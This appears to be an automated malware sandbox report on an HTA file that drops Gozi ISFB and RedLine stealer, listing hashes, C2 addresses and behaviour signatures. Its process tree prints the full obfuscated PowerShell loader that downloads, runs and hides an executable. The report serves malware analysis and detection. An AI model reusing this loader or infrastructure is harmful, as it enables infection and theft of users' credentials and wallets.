Analysis

  • max time kernel
    109s
  • max time network
    106s
  • platform
    windows7_x64
  • resource
    win7-20220715-en
  • resource tags

    arch:x64 arch:x86 image:win7-20220715-en locale:en-us os:windows7-x64 system
  • submitted
    05-08-2022 01:33

General

  • Target

    55.hta

  • Size

    12KB

  • MD5

    26ace4f34d7b5df03722125fe5280d4c

  • SHA1

    7b9e7c2c60e66ec42061752d707ab70c3c84187a

  • SHA256

    e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad

  • SHA512

    5ad6cc4ae057d85a37f73b586ed0bbcf9857e7d918f302ba49772029d00bea6cb55d24f1249e33c0b2e05596fdaee813df0105032d96d91d56601b33b8555115

Malware Config

Extracted

Family

gozi_ifsb

Botnet

11111

C2

trackingg-protectioon.cdn1.mozilla.net

194.76.225.168

194.76.224.242

Attributes
  • base_path

    /fonts/

  • build

    250240

  • exe_type

    loader

  • extension

    .bak

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

redline

Botnet

bart

C2

80.66.87.52:2500

Attributes
  • auth_value

    7d4c7c8f7ce4a858768b38d88316bd46

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1136
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1876
      • C:\Users\Admin\AppData\Roaming\bartor.exe
        "C:\Users\Admin\AppData\Roaming\bartor.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1916
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:696
          • C:\Users\Admin\Downloads\WinZip.exe
            C:\Users\Admin\Downloads\WinZip.exe
            5⤵
            • Executes dropped EXE
            PID:1944
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1580
          • C:\Windows\SysWOW64\choice.exe
            choice /C Y /N /D Y /T 7
            5⤵
              PID:1444

    Downloads

    • C:\Users\Admin\AppData\Roaming\bartor.exe

      Filesize

      494KB

      MD5

      0f2be4fe0362766dcf339d4c03326bc4

      SHA1

      69e26e9e75e8a8359d232d8e14318b9235e1a828

      SHA256

      2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529

      SHA512

      8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

    • C:\Users\Admin\Downloads\WinZip.exe

      Filesize

      338KB

      MD5

      468042278a3e4841d3e33ccca10d99ca

      SHA1

      22532f37096a200d448420359c01bbebaaf6b820

      SHA256

      b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86

      SHA512

      4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf
